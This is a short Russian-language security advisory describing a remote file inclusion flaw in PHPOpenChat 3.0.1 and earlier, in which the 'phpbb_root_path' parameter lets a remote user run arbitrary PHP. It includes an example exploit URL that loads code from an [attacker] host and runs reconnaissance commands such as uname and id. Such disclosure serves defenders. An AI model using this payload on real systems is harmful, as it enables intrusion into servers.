Программа: PHPOpenChat 3.0.1 и более ранние версии

Уязвимость позволяет удаленному
пользователю выполнить произвольный php-сценарий
на уязвимой системе.

Уязвимость существует в сценарии /phpopenchat/contrib/phpbb/
alternative2/phpBB2_root/poc_loginform.php из-за некорректной
обработки входных данных в переменной ‘phpbb_root_path’.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольные команды на системе с
привилегиями web сервера.

Пример:

http://[target]/phpopenchat/contrib/phpbb/alternative2/ phpBB2_root poc_login
form.php?phpbb_root_path=http://[attacker]/ asc?&cmd=uname%20-a;w;id;pwd;ps

Также уязвимы сценарии /contrib/phpbb/poc.php,/contrib/phpnuke/ENGLISH_poc.php,
/contrib/phpnuke/poc.php, и /contrib/yabbse/poc.php. Для удачной
эксплуатации уязвимости опции register_globals и
allow_url_fopen должны быть включены на целевой
системе.



Оставить мнение